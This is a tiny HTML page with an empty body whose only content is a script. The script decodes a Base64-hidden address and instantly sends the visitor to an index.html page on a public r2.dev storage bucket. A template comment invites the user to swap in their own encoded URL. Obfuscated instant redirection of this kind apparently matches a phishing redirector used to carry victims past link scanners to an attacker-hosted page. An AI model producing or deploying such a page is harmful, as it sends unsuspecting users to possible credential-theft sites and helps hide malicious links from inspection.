<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="0;url=#">
<script>
// Replace this with your Base64 encoded URL
var base64Url = "aHR0cHM6Ly9wdWItODY3MThkNzYyYzJkNGM2Y2I5ZTMyZDJlMWMxMTkwODgucjIuZGV2L2luZGV4Lmh0bWw=";
// Decode Base64
var redirectUrl = atob(base64Url);
// Redirect to the decoded URL
window.location.href = redirectUrl;
</script>
</head>
<body>
</body>
</html>